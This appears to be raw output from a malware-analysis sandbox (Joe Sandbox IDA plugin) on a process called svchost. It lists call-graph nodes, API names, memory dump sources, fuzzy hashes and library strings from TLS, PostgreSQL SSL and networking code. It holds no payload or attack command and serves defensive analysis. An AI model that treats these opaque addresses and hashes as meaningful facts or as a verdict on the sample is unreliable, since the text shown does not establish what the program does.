105382 7ffda36d3398 105381->105382 105419 7ffda36d6ae0 105381->105419 105382->105373 105387 7ffda36d67db 105386->105387 105391 7ffda36d6805 105386->105391 105389 7ffda36d6801 105387->105389 105387->105391 105642 7ffda36da920 31 API calls Concurrency::details::SchedulerProxy::DeleteThis 105387->105642 105390 7ffda36d685f _time64 105389->105390 105389->105391 105393 7ffda36d34c0 27 API calls 105389->105393 105636 7ffda36e2930 105389->105636 105390->105389 105391->105375 105393->105389 105395 7ffda36da0b4 WSAStartup 105394->105395 105396 7ffda36da0cf WSASetLastError malloc 105394->105396 105397 7ffda36da0c8 105395->105397 105405 7ffda36da0ea 105395->105405 105398 7ffda36da0f1 memset malloc malloc malloc 105396->105398 105396->105405 105397->105396 105567 7ffda36ebca0 malloc 105398->105567 105403 7ffda36ebca0 malloc 105406 7ffda36da1dd 105403->105406 105569 7ffda36f6230 105405->105569 105406->105405 105578 7ffda36d9330 53 API calls Concurrency::details::SchedulerProxy::DeleteThis 105406->105578 105407 7ffda36d6a20 105581 7ffda36da810 199 API calls 105407->105581 105409 7ffda36d6a42 105410 7ffda36d6a4a 105409->105410 105582 7ffda36d9240 29 API calls Concurrency::details::SchedulerProxy::DeleteThis 105409->105582 105410->105381 105412 7ffda36d6a6a 105413 7ffda36d6aac 105412->105413 105414 7ffda36d6a6e 105412->105414 105415 7ffda36d6aca free 105413->105415 105416 7ffda36d6ab5 free 105413->105416 105417 7ffda36d6a96 free 105414->105417 105418 7ffda36d6a81 free 105414->105418 105415->105381 105416->105415 105416->105416 105417->105381 105418->105417 105418->105418 105422 7ffda36d6b10 calloc 105419->105422 105421 7ffda36d77e5 105616 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105421->105616 105422->105421 105434 7ffda36d6bc6 105422->105434 105424 7ffda36d6da0 105427 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105424->105427 105425 7ffda36d6d50 105583 7ffda36e2d70 27 API calls 
Concurrency::details::SchedulerProxy::DeleteThis 105425->105583 105426 7ffda36d6f97 105431 7ffda36d7009 free 105426->105431 105438 7ffda36d701b 105426->105438 105435 7ffda36d338c 105427->105435 105428 7ffda36d6e2a free 105443 7ffda36d6da5 105428->105443 105429 7ffda36d6f2f 105442 7ffda36d6f9e 105429->105442 105449 7ffda36d6f99 105429->105449 105450 7ffda36d6f3d 105429->105450 105585 7ffda36d2860 30 API calls Concurrency::details::SchedulerProxy::DeleteThis 105431->105585 105432 7ffda36d6d4b 105432->105425 105432->105443 105433 7ffda36d6c13 malloc 105436 7ffda36d6c46 105433->105436 105437 7ffda36d6c33 memcpy 105433->105437 105434->105433 105441 7ffda36d6c7d 105434->105441 105435->105382 105557 7ffda36d68e0 105435->105557 105436->105421 105436->105434 105436->105441 105437->105436 105438->105424 105447 7ffda36d703e free _strdup 105438->105447 105453 7ffda36d705b 105438->105453 105440 7ffda36d6cd2 malloc 105445 7ffda36d6d0b 105440->105445 105446 7ffda36d6cf8 memcpy 105440->105446 105441->105425 105441->105432 105441->105440 105441->105443 105584 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105442->105584 105443->105428 105444 7ffda36d6e54 _strdup 105443->105444 105451 7ffda36d6dff isalpha 105443->105451 105454 7ffda36d6e7d 105443->105454 105444->105421 105444->105443 105445->105421 105445->105441 105457 7ffda36d6d44 105445->105457 105446->105445 105447->105421 105447->105453 105448 7ffda36d6ec3 malloc 105455 7ffda36d6ef6 105448->105455 105456 7ffda36d6ee3 memcpy 105448->105456 105449->105426 105449->105442 105450->105426 105458 7ffda36d6f60 _strdup 105450->105458 105451->105443 105459 7ffda36d707f memset SHGetFolderPathA 105453->105459 105464 7ffda36d7190 105453->105464 105472 7ffda36d7119 105453->105472 105454->105426 105454->105429 105454->105448 105455->105421 105455->105429 105455->105454 105456->105455 105457->105425 105457->105432 105458->105421 105458->105450 105461 7ffda36d70b1 105459->105461 105459->105472 105460 7ffda36d73b6 
105462 7ffda36d74c9 _strdup 105460->105462 105477 7ffda36d73d8 105460->105477 105586 7ffda36f1830 105461->105586 105462->105421 105465 7ffda36d73f5 105462->105465 105464->105460 105467 7ffda36d71df malloc 105464->105467 105470 7ffda36d75c1 _strdup 105465->105470 105487 7ffda36d74fd 105465->105487 105467->105421 105469 7ffda36d7203 memcpy 105467->105469 105468 7ffda36d70f1 105471 7ffda36f1830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 105468->105471 105532 7ffda36d722a 105469->105532 105470->105421 105478 7ffda36d7514 105470->105478 105471->105472 105472->105464 105589 7ffda36da9f0 95 API calls Concurrency::details::SchedulerProxy::DeleteThis 105472->105589 105473 7ffda36d73fa 105590 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105473->105590 105474 7ffda36d7264 strcmp 105474->105532 105476 7ffda36d74a7 105592 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105476->105592 105477->105465 105477->105476 105481 7ffda36d7615 strcmp 105478->105481 105486 7ffda36d7646 105478->105486 105485 7ffda36d7628 105481->105485 105481->105486 105482 7ffda36d77e1 105482->105421 105484 7ffda36d7889 _strdup 105482->105484 105511 7ffda36d7808 105482->105511 105483 7ffda36d7413 free 105483->105424 105484->105421 105492 7ffda36d7825 105484->105492 105594 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105485->105594 105488 7ffda36d76e3 105486->105488 105595 7ffda36f39e0 isupper tolower isupper tolower 105486->105595 105487->105478 105497 7ffda36d7576 strcmp 105487->105497 105493 7ffda36d7779 105488->105493 105600 7ffda36f39e0 isupper tolower isupper tolower 105488->105600 105489 7ffda36d739f free 105489->105460 105489->105464 105496 7ffda36d7975 _strdup 105492->105496 105519 7ffda36d78b6 105492->105519 105493->105482 105493->105493 105605 7ffda36f39e0 isupper tolower isupper tolower 105493->105605 105495 7ffda36d767d 105495->105488 105596 7ffda36f39e0 isupper tolower isupper tolower 
105495->105596 105496->105421 105501 7ffda36d798e 105496->105501 105497->105478 105498 7ffda36d7589 strcmp 105497->105498 105498->105478 105502 7ffda36d759c 105498->105502 105499 7ffda36d72fa strcmp 105499->105532 105500 7ffda36d7713 105500->105493 105601 7ffda36f39e0 isupper tolower isupper tolower 105500->105601 105509 7ffda36d7a01 strcmp 105501->105509 105530 7ffda36d79c3 105501->105530 105593 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105502->105593 105506 7ffda36d7690 105506->105488 105597 7ffda36f39e0 isupper tolower isupper tolower 105506->105597 105507 7ffda36d7726 105507->105493 105602 7ffda36f39e0 isupper tolower isupper tolower 105507->105602 105508 7ffda36d742a 105591 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105508->105591 105514 7ffda36d7a1d strcmp 105509->105514 105509->105530 105510 7ffda36d7867 105608 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105510->105608 105511->105492 105511->105510 105514->105530 105539 7ffda36d7a3c 105514->105539 105516 7ffda36d77bf 105516->105482 105606 7ffda36f39e0 isupper tolower isupper tolower 105516->105606 105518 7ffda36d7953 105610 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105518->105610 105519->105518 105520 7ffda36d78d5 105519->105520 105520->105501 105524 7ffda36d7935 105520->105524 105522 7ffda36d76a3 105522->105488 105598 7ffda36f39e0 isupper tolower isupper tolower 105522->105598 105523 7ffda36d744a free 105523->105424 105609 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105524->105609 105526 7ffda36d7739 105526->105493 105603 7ffda36f39e0 isupper tolower isupper tolower 105526->105603 105527 7ffda36d79f9 105556 7ffda36d7b79 105527->105556 105612 7ffda36f1750 RAND_bytes 105527->105612 105530->105527 105531 7ffda36d7c0d 105530->105531 105530->105556 105614 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105531->105614 
105532->105473 105532->105474 105532->105489 105532->105499 105532->105508 105534 7ffda36d77d2 105534->105421 105607 7ffda36f39e0 isupper tolower isupper tolower 105534->105607 105535 7ffda36d7c65 free 105615 7ffda36f4980 39 API calls Concurrency::details::SchedulerProxy::DeleteThis 105535->105615 105538 7ffda36d76b6 105538->105488 105544 7ffda36d76ba 105538->105544 105539->105530 105545 7ffda36d7aa2 strcmp 105539->105545 105543 7ffda36d774c 105543->105493 105549 7ffda36d7750 105543->105549 105599 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105544->105599 105545->105530 105546 7ffda36d7ac4 105545->105546 105611 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105546->105611 105547 7ffda36d7c74 105553 7ffda36d7c7b _strdup 105547->105553 105548 7ffda36d7b31 105548->105556 105613 7ffda36f32e0 GetSystemTimePreciseAsFileTime 105548->105613 105604 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105549->105604 105553->105421 105553->105424 105555 7ffda36d7b51 _getpid 105555->105556 105556->105424 105556->105535 105558 7ffda36d691d 105557->105558 105560 7ffda36d68ee 105557->105560 105558->105382 105561 7ffda36d692f 105560->105561 105562 7ffda36d6900 105560->105562 105565 7ffda36d6913 105560->105565 105627 7ffda36d34c0 105561->105627 105633 7ffda36ec210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 105562->105633 105566 7ffda36d6981 105565->105566 105634 7ffda36d63c0 10 API calls 105565->105634 105566->105382 105568 7ffda36da1ce 105567->105568 105568->105403 105570 7ffda36f6239 105569->105570 105571 7ffda36d3362 105570->105571 105572 7ffda36f6664 IsProcessorFeaturePresent 105570->105572 105571->105378 105571->105407 105573 7ffda36f667c 105572->105573 105579 7ffda36f6968 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 105573->105579 105575 7ffda36f668f 105580 7ffda36f6630 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess 
TerminateProcess 105575->105580 105579->105575 105581->105409 105582->105412 105583->105424 105584->105424 105585->105438 105617 7ffda36f1db0 _errno 105586->105617 105589->105472 105590->105483 105591->105523 105592->105424 105593->105424 105594->105424 105595->105495 105596->105506 105597->105522 105598->105538 105599->105424 105600->105500 105601->105507 105602->105526 105603->105543 105604->105424 105605->105516 105606->105534 105607->105482 105608->105424 105609->105424 105610->105424 105611->105424 105612->105548 105613->105555 105614->105424 105615->105547 105616->105424 105618 7ffda36f240f 105617->105618 105621 7ffda36f1df7 105617->105621 105619 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105618->105619 105620 7ffda36d70cf free malloc 105619->105620 105620->105421 105620->105468 105621->105621 105623 7ffda36f1e46 105621->105623 105625 7ffda36f1ec3 _errno 105621->105625 105623->105618 105623->105621 105624 7ffda36f2670 fwrite fwrite Concurrency::details::SchedulerProxy::DeleteThis 105623->105624 105626 7ffda36f23fc 105623->105626 105624->105623 105625->105618 105626->105618 105629 7ffda36d3525 105627->105629 105632 7ffda36d4dae 105627->105632 105628 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105630 7ffda36d4dc9 105628->105630 105635 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105629->105635 105630->105565 105632->105628 105633->105565 105634->105558 105635->105632 105643 7ffda36e3290 33 API calls Concurrency::details::SchedulerProxy::DeleteThis 105636->105643 105638 7ffda36e2946 105639 7ffda36e294a 105638->105639 105644 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105638->105644 105639->105389 105641 7ffda36e2966 105641->105389 105642->105389 105643->105638 105644->105641 105645 7ffda36d4218 105646 7ffda36d4231 105645->105646 105647 7ffda36d4a9a 105646->105647 105649 7ffda36d425d 105646->105649 105674 7ffda36d48a3 105646->105674 105733 
7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105647->105733 105713 7ffda36e20a0 105649->105713 105650 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105652 7ffda36d4dc9 105650->105652 105653 7ffda36d4285 105655 7ffda36d42e2 105653->105655 105656 7ffda36d4a7f 105653->105656 105671 7ffda36d428f 105653->105671 105658 7ffda36d42eb 105655->105658 105659 7ffda36d4434 105655->105659 105732 7ffda36e1de0 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 105656->105732 105657 7ffda36d49d9 105729 7ffda36e1fb0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 105657->105729 105722 7ffda36e52a0 58 API calls Concurrency::details::SchedulerProxy::DeleteThis 105658->105722 105661 7ffda36d4a56 105659->105661 105662 7ffda36d443d 105659->105662 105731 7ffda36e5920 50 API calls Concurrency::details::SchedulerProxy::DeleteThis 105661->105731 105666 7ffda36e20a0 32 API calls 105662->105666 105670 7ffda36d4456 105666->105670 105667 7ffda36d42f5 105667->105671 105685 7ffda36d42fd 105667->105685 105669 7ffda36d49f6 105669->105671 105672 7ffda36d4a1f 105669->105672 105670->105671 105673 7ffda36d445e 105670->105673 105671->105674 105735 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105671->105735 105672->105674 105730 7ffda36ec280 free realloc free Concurrency::details::SchedulerProxy::DeleteThis 105672->105730 105724 7ffda36d2330 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105673->105724 105674->105650 105677 7ffda36d4475 105677->105674 105725 7ffda36e2880 fflush 105677->105725 105679 7ffda36d3b13 105681 7ffda36d3b83 105679->105681 105719 7ffda36d63c0 10 API calls 105679->105719 105680 7ffda36d361d free 105712 7ffda36d357a 105680->105712 105683 7ffda36d3bb2 105681->105683 105684 7ffda36d4d8e 105681->105684 105726 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105683->105726 105734 7ffda36e2d70 27 API calls 
Concurrency::details::SchedulerProxy::DeleteThis 105684->105734 105685->105712 105723 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105685->105723 105686 7ffda36d3b61 105720 7ffda36dae50 free free free free 105686->105720 105687 7ffda36d3662 memset 105687->105712 105692 7ffda36d3b69 105721 7ffda36de5f0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 105692->105721 105693 7ffda36d36a3 _errno strtol 105693->105683 105696 7ffda36d36ce _errno 105693->105696 105695 7ffda36f1830 12 API calls Concurrency::details::SchedulerProxy::DeleteThis 105695->105712 105696->105683 105696->105712 105697 7ffda36d36f0 isspace 105697->105712 105698 7ffda36d3911 calloc 105700 7ffda36d48a8 105698->105700 105701 7ffda36d392f 105698->105701 105699 7ffda36d3852 105699->105698 105699->105699 105727 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105700->105727 105702 7ffda36d3998 105701->105702 105704 7ffda36d3940 memcpy 105701->105704 105718 7ffda36ee290 free free freeaddrinfo 105702->105718 105704->105702 105704->105704 105705 7ffda36d48b7 105728 7ffda36ee290 free free freeaddrinfo 105705->105728 105707 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105707->105712 105709 7ffda36ee100 calloc calloc free getaddrinfo 105709->105712 105710 7ffda36d48c4 105710->105674 105711 7ffda36d39a5 105711->105679 105712->105674 105712->105679 105712->105680 105712->105683 105712->105687 105712->105693 105712->105695 105712->105697 105712->105699 105712->105707 105712->105709 105714 7ffda36e20ad 105713->105714 105717 7ffda36d426f 105713->105717 105715 7ffda36e20b3 105714->105715 105714->105717 105736 7ffda36de7c0 32 API calls Concurrency::details::SchedulerProxy::DeleteThis 105715->105736 105717->105653 105717->105657 105717->105674 105718->105711 105719->105686 105720->105692 105721->105681 105722->105667 105723->105712 105724->105677 105725->105712 105726->105674 105727->105705 105728->105710 105729->105669 
105730->105674 105731->105671 105732->105674 105733->105674 105734->105674 105735->105674 105736->105717 105737 7ffda3751ac0 105742 7ffda3751b10 105737->105742 105738 7ffda3751c28 inet_pton 105740 7ffda3751c46 inet_pton 105738->105740 105746 7ffda3751c40 105738->105746 105739 7ffda3751b53 105741 7ffda3751ce7 105740->105741 105740->105746 105743 7ffda3751460 2 API calls 105741->105743 105747 7ffda3751d08 105741->105747 105742->105738 105742->105739 105743->105747 105744 7ffda3751deb htons inet_pton 105745 7ffda3751e2c calloc 105744->105745 105754 7ffda3751d7c 105744->105754 105750 7ffda3751e51 calloc 105745->105750 105759 7ffda3751e49 105745->105759 105746->105739 105762 7ffda37523f0 inet_pton inet_pton inet_ntop SimpleString::operator= 105746->105762 105747->105739 105747->105744 105747->105754 105749 7ffda3751f83 105749->105739 105751 7ffda3751f9b 105749->105751 105757 7ffda3751fa2 105749->105757 105756 7ffda3751ed4 htons inet_pton 105750->105756 105750->105759 105760 7ffda3744310 memset calloc memmove htons free 105751->105760 105754->105739 105754->105746 105754->105749 105755 7ffda3751fa0 105755->105757 105756->105759 105757->105739 105761 7ffda37523f0 inet_pton inet_pton inet_ntop SimpleString::operator= 105757->105761 105759->105754 105759->105759 105760->105755 105761->105739 105762->105739 105763 7ffd946ba950 105797 7ffd94749d10 105763->105797 105765 7ffd946ba99d GetModuleHandleExW 105766 7ffd946ba9d8 GetModuleFileNameW 105765->105766 105767 7ffd946ba9bd 105765->105767 105766->105767 105768 7ffd946ba9f1 105766->105768 105814 7ffd9471a510 8 API calls 2 library calls 105767->105814 105798 7ffd94698f40 104 API calls 5 library calls 105768->105798 105770 7ffd946baba4 105772 7ffd946baa26 105780 7ffd946babe8 105772->105780 105792 7ffd946baa30 105772->105792 105773 7ffd946bac91 105774 7ffd946badbb 105773->105774 105781 7ffd946baca1 105773->105781 105775 7ffd946964f0 104 API calls 105774->105775 105794 7ffd946bab0c 105774->105794 105775->105794 105776 7ffd946bab8d 
105776->105767 105778 7ffd946bac83 105783 7ffd946964f0 104 API calls 105778->105783 105779 7ffd946bae2e 105817 7ffd947297f4 102 API calls _invalid_parameter_noinfo_noreturn 105779->105817 105780->105773 105815 7ffd94698f40 104 API calls 5 library calls 105780->105815 105816 7ffd94698f40 104 API calls 5 library calls 105781->105816 105783->105773 105784 7ffd946bad66 105788 7ffd946964f0 104 API calls 105784->105788 105787 7ffd946bae33 105818 7ffd947297f4 102 API calls _invalid_parameter_noinfo_noreturn 105787->105818 105788->105794 105789 7ffd946baafe 105800 7ffd946964f0 105789->105800 105799 7ffd94698f40 104 API calls 5 library calls 105792->105799 105794->105767 105794->105776 105794->105779 105794->105787 105797->105765 105798->105772 105799->105789 105801 7ffd9469651e 105800->105801 105805 7ffd946965d4 105801->105805 105806 7ffd94696613 105801->105806 105807 7ffd946965ad 105801->105807 105809 7ffd9469653a ctype 105801->105809 105813 7ffd9469660d 105801->105813 105808 7ffd9471a538 std::_Facet_Register 104 API calls 105805->105808 105830 7ffd94692c50 104 API calls std::_Throw_Cpp_error 105806->105830 105807->105813 105819 7ffd9471a538 105807->105819 105808->105809 105809->105794 105811 7ffd946965be 105811->105809 105828 7ffd947297f4 102 API calls _invalid_parameter_noinfo_noreturn 105811->105828 105829 7ffd94692b80 104 API calls 2 library calls 105813->105829 105814->105770 105815->105778 105816->105784 105820 7ffd9471a543 105819->105820 105821 7ffd9471a55c 105820->105821 105823 7ffd9471a562 105820->105823 105831 7ffd94735790 105820->105831 105821->105811 105824 7ffd9471a56d 105823->105824 105834 7ffd94717b18 104 API calls Concurrency::cancel_current_task 105823->105834 105835 7ffd94692b80 104 API calls 2 library calls 105824->105835 105827 7ffd9471a573 std::_Facet_Register 105827->105811 105829->105806 105836 7ffd947357e0 105831->105836 105835->105827 105841 7ffd94734a90 EnterCriticalSection 105836->105841 105842 7ffd94695670 105843 7ffd9469567c _Getctype 
Memory Dump Source
• Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
• Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
Similarity
• API ID: AddressHandleModuleProcfree
• String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
• API String ID: 3799942571-230586194
• Opcode ID: cd151eb02162fe162480a3690277774b33a588f8d099033d8d492b2adcfb8331
• Instruction ID: 1f0eb572f10a5022b7023827e84d63346ec2a4679892cc84b8d9ea0fb7bcfd55
• Opcode Fuzzy Hash: cd151eb02162fe162480a3690277774b33a588f8d099033d8d492b2adcfb8331
• Instruction Fuzzy Hash: 2A92E222B0AB8287FB518F21A8603B977A2FF44785F045135DA4D67B96DF3EE580C708
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: R_get_error_errnofree$S_methodX_ctrlX_freeX_newX_set_cert_cbX_set_default_passwd_cbX_set_default_passwd_cb_userdataX_set_optionslibintl_dgettextmalloc
• String ID: %s/%s$0123456789.$certificate does not match private key file "%s": %s$certificate present, but not private key file "%s"$could not create SSL context: %s$could not establish SSL connection: %s$could not get home directory to locate root certificate fileEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$could not initialize SSL user "%s": %s$could not load SSL user "%s": %s$could not load private SSL key "%s" from user "%s": %s$could not load private key file "%s": %s$could not load system root certificate paths: %s$could not open certificate file "%s": %s$could not read certificate file "%s": %s$could not read private SSL key "%s" from user "%s": %s$could not read root certificate file "%s": %s$could not set SSL Server Name Indication (SNI): %s$could not set maximum SSL protocol version: %s$could not set minimum SSL protocol version: %s$could not stat private key file "%s": %m$invalid value "%s" for maximum SSL protocol version$invalid value "%s" for minimum SSL protocol version$out of memory$out of memory allocating error description$postgresql.crt$postgresql.key$private key file "%s" is not a regular file$root certificate file "%s" does not existEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$root.crl$root.crt$system
• API String ID: 1953776291-2113827057
• Opcode ID: 3bc42ec7b35e5b906b041cde520f6272f9448a04cac596296e9510dd570b6f65
• Instruction ID: 8ee088cbc7b0e809cd49afddde9775e9280840f9e54ce213c801ba2bc6c8b761
• Opcode Fuzzy Hash: 3bc42ec7b35e5b906b041cde520f6272f9448a04cac596296e9510dd570b6f65
• Instruction Fuzzy Hash: 8B62BF61F0F64381FE559B2594303B92393AF81B94F6C6632DA1D277DBDE2EE4098318

Control-flow Graph
[Control-flow graph of the function starting at 7ffda36142d0; node/edge dump omitted. The APIs it calls are summarized in the API ID field below.]
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
• Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: R_newR_set_debugR_set_error
• String ID: SSL_CTX_new_ex$ssl\ssl_lib.c
• API String ID: 1552677711-2988157636
• Opcode ID: 2d18674f58328bab6f3900cf6a3c4050cfb0983589f8cdbd3d48ee3dfe0e78b7
• Instruction ID: 11201559df47d48b3c7a43ced28ba5165ed691780b97370b747e9fa20a03a94a
• Opcode Fuzzy Hash: 2d18674f58328bab6f3900cf6a3c4050cfb0983589f8cdbd3d48ee3dfe0e78b7
• Instruction Fuzzy Hash: F7E18E21B0F78382FB51AB6194723B922A7AF45784F4C6035D94D677CBEE3EE4018319

Control-flow Graph
[Control-flow graph of the function starting at 7ffda3610eb0; node/edge dump omitted. The APIs it calls are summarized in the API ID field below.]
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
• Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: Y_asn1_find_strY_asn1_get0_info$E_fetchH_fetchR_pop_to_markR_set_mark$D_get_sizeE_freeH_freeJ_nid2snR_fetch
• String ID: $ $ $ $DSA$ECDH$ECDSA$gost-mac$gost-mac-12$gost2001$gost2012_256$gost2012_512$kuznyechik-mac$magma-mac
• API String ID: 2321393641-365409564
• Opcode ID: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
• Instruction ID: 422108d8d880c3dd3e0e6a9ffe49dc234633aa084c14d6f4d3e09dea27fa972c
• Opcode Fuzzy Hash: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
• Instruction Fuzzy Hash: FFE19E72B0AB9286F7508F24D4616A937A2FB44758F082135FE4D5779AEF3AE490C708

Control-flow Graph
[Control-flow graph of the function starting at 7ffda377b470; node/edge dump omitted. The APIs it calls are summarized in the API ID field below.]
Memory Dump Source
• Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
• Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectoryHandleModuleSystem$CleanupFrequencyPerformanceQueryStartupfreemallocwcspbrk
• String ID: AddDllDirectory$FreeAddrInfoExW$GetAddrInfoExCancel$GetAddrInfoExW$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32$ws2_32
• API String ID: 1741924799-1796637598
• Opcode ID: 2697f331b37d98f652b4482058136af72a4de187b0d93a3241bab0ceee7d76f6
• Instruction ID: 73009f66ae22aace9264cedb357590652a338206d6afbf4a106f0cd761b6ead7
• Opcode Fuzzy Hash: 2697f331b37d98f652b4482058136af72a4de187b0d93a3241bab0ceee7d76f6
• Instruction Fuzzy Hash: 98817421B0AA8682FB619F15E43537933A3BF89B84F444135C94E677A6EF7EE405C708

Control-flow Graph
[Control-flow graph of the function starting at 7ffda3732b20; node/edge dump omitted. The APIs it calls are summarized in the API ID field below.]
                                                                                            APIs
                                                                                            Memory Dump Source
